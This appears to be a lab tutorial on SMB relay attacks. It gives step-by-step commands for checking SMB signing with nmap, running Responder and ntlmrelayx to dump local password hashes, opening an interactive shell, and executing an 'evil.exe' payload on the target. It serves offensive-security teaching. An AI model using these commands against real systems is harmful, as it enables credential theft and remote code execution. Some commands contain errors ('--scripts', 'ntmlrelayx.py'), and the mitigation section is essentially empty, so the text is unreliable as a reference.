SMB Relay Attacks

SMB Relay is a powerful network attack that abuses weaknesses in NTLM authentication within the SMB protocol. Instead of cracking password hashes, an attacker relays authentication requests in real time to another system, gaining unauthorized access without knowing the actual password.

SMB Vulnerability to Relay Attacks

• SMB relies on NTLM authentication, which is susceptible to relay attacks.
• During access to shared resources, SMB initiates authentication for the Active Directory user.
• Authentication requests can be intercepted and relayed to another system.
• The target system may accept relayed credentials without verifying their origin.
• Lack of SMB signing enforcement allows this exploitation.
• Results in unauthorized access while impersonating a legitimate user.

Hands-On Lab: SMB Relay Attack

As previously we have tried hash dumping and breakthrough with responder. Now we will dump the hashes of all the possible local users of the victim's systems.

Step 1: Check SMB Signing

• First, we need to check whether the PC is vulnerable to the particular exploit we are looking for or not.
• To perform this check, we will use Nmap with its NSE script.

Command:

nmap --scripts=smb2-security-mode.nse -p445 10.0.2.0/24

Output:

Here you can notice Windows Server is on [10.0.2.15] where smb2 is signing is required whereas on Windows 10 PC the smb is not requiring smb signing. We can take leverage of this vulnerability.

Step 2: Configure Responder

• For further process you may need to change the configuration settings of responder.conf .
• Turn off the SMB and HTTP servers option in the config file and then save the changes made. Enter these commands to do so:

Edit config:

sudo gedit /usr/share/responder/Responder.conf

set:

# SMB = Off
# HTTP = Off

Output:

Step 3: Define Targets

• Save the PC2 Machine's IP in a target.txt file.
• Now run the responder similar to how we ran it in the previous lab on LLMNR poisoning.

Create a file: nano targets.txt
Add: 10.0.2.10

Step 4: Start Responder

Start Responder to listen for NTLM authentication attempts. Run the below command:

sudo responder -I eth0 -wdv

Output:

Step 5: Launch SMB Relay

Set up the relay with ntlmrelayx. Run the below command:

ntmlrelayx.py -tf targets.txt -smb2support

Output:

• Now, let's interact with the PC1 machine and enter the local IP of our attacker's machine [10.0.2.7].

• Now, in the ntlmrelayx listener, you will receive the hash dump of all the local users accessible on Franklin's PC

Interactive Shell Access

Another option for the SMB relay attack is to gain an interactive shell, for which you have to enter this command:

ntlmrelayx.py -tf targets.txt -smb2support -i

Output:

To get a shell, In another terminal, we will open a Netcat listener for shell access.

nc 127.0.0.1 11000

• From this shell, we can do many things. For example, you can enter help to list all the available options for the interactive shell, such as: shares, mkdir, login hash, use ADMINS, etc.
• Similarly, you can upload an executable generated with the msfvenom payload using this command:

  ntlmrelayx.py -tf targets.txt -smb2support -e evil.exe

SMB Relay - Mitigation Strategies

These mitigation strategies significantly reduce the risk of SMB relay attacks, but organizations must balance security with usability and carefully test changes before wide deployment.

SMB Relay vs SMB Replay